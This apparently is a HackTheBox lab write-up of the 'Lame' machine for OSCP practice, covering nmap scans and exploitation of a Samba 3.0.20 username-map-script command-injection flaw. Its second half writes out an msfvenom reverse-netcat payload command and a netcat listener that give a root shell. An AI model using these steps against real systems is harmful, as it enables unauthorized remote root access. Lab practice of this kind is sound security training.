Lame is a retired box on HackTheBox. Currently I am preparing for OSCP, this box is mentioned in TJ_Null’s list of OSCP like VMs. So I am going to do it without metasploit (since, metasploit is allowed only once in the exam). Let us begin.
I am going to start with nmap.
I did a simple port scan and found ports 21, 22 139 and 445 to be open.
-p : specifying ports.
-sV : version detection.
Here, I did a service version scan (with -sV switch of nmap) to find exactly what version of the softwares are running on the ports.
Let us now dig deeper and do a nmap default script scan (with the -sC switch).
-sC : default script scan.
I could not snap the whole screen as the output was quite large. But the above shot has everything we need to know.
Script scan reveals that the box is running Samba 3.0.20-Debian on port 445.
If you do a search on this samba version, you will get to know that this version has a command execution vulnerability, when using the non-default ‘username map script’ configuration option. By specifying a username containing shell meta characters, anyone can execute arbitrary commands. No authentication is needed to exploit this vulnerability since this option is used to map usernames prior to authentication.
After a google search, I found this exploit on github.
However, for the exploit to work, you will need to modify it a bit.
You have to put your IP address and port to get a reverse shell.
I am going to generate payload via msfvenom and put it on the buf variable.
msfvenom -p cmd/unix/reverse_netcat LHOST=<IP> LPORT=<PORT> -f python
Copy the output and paste it on the exploit code. On a second terminal tab, set up a netcat listener.
nc -nlvp <PORT>
Remember to listen on the same port that you provided on the payload.
Run the python code, and you should get a shell.
We do not need to escalate our privileges as we are already root. Now you can read and submit the flags.
So that was the Lame box. Hope you liked it :)
THANK YOU ; )